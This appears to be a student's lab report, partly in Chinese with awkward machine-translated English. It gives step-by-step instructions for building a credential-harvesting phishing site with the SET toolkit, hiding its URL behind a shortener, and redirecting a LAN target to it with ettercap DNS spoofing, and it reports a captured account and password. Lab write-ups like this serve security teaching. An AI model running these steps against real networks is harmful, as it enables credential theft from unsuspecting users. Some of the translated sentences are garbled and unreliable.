1. Answers to basic questions
(1) What scenarios are usually vulnerable to DNS spoof attacks
Connect to a wireless network and be in the same local area network as the malicious attacker.
(2) How to prevent the above two attack methods in daily work
First of all, never click on a web page that the browser considers unsafe. If you must open it, use fake information to test it before typing any information to submit. Phishing websites may not jump. The internet.
2. Record of practice process
- 1. Simple application of SET tool to create a fake website
Operations in the attack aircraft:
1. 要将钓鱼网站挂在本机的http服务下,所以需要将SET工具的访问端口改为默认的80端口。
使用sudo vi /etc/apache2/ports.conf
修改Listen后的端口号为80(一般原本都是80)
2. 查看80端口下是否有占用进程
netstat -tupln |grep 80
若有
kill 进程号
3.使用apachectl start开启Apache服务
4. 输入setoolkit打开SET工具
1) Social-Engineering Attacks
->
2) Website Attack Vectors
->
3) Credential Harvester Attack Method
->
1) Web Templates或2) Site Cloner
->
输入kali(攻击机)的ip
->
输入自己设定的url(如果选择 Web Templates不会出现这一步,选择Site Cloner选择伪装网站的地址)
注意这里会有关于是否停止apache服务y或n的选择,选择y。
URLs of phishing sites can be disguised in Url Shortener .
Using this link to open may take a few seconds to jump
Failed to disguise with www.cnblogs.com because it is useless to not display the login link, the phishing should be more direct and
directly use the login URL of the blog garden as a disguise, but since the human-computer authentication component cannot be loaded, the login name and password cannot be sent back to the server. , abandon the blog garden. . .
In Website Attack Vectorsthe next step of the selection, choose Web Templatesnot Site Cloner, there will be 5 camouflaged domain names to be selected, and after selection, a phishing website will be generated.
Chrome shows that the webpage is not secure:
Success~Acquired account and password!
- 2. ettercap DNS spoof
This process is mainly to sniff the host access to the domain name bound to the attack machine ip
Attack aircraft operation process:
1. 使用指令ifconfig eth0 promisc将kali网卡改为混杂模式
2. 输入命令vi /etc/ettercap/etter.dns对DNS缓存表进行修改
增加“域名 A 攻击机ip”
3. 输入ettercap -G指令,开启ettercap
4. 点击工具栏中的Sniff——>unified sniffing,默认选择eth0,确认。
5. Hosts下先点击Scan for hosts扫描子网,再点击Hosts list查看存活主机(NAT模式下只会看到自己的虚拟机和主机)
6. 将kali网关的IP(x.x.x.2)添加到target1,靶机IP添加到target2
7. Plugins—>Manage the plugins,双击dns_spoof
8. Start->Start Sniffing
Bind the domain name of the attacking machine or directly access it before pinging with the target machine, and the attacking machine will receive the message.
- 3. Combine the application of two technologies, use DNS spoof to guide specific access to impostor websites
Combining the previous two steps, the main reason is that the domain name used when visiting looks more credible.
3. Practice summary and experience
The experiment is very simple to do, and it also shows how easy it is to collect information when others want to attack us in the same wireless LAN. It also shows that we are in danger all the time in the network environment, and we must be vigilant and prevent problems before they happen.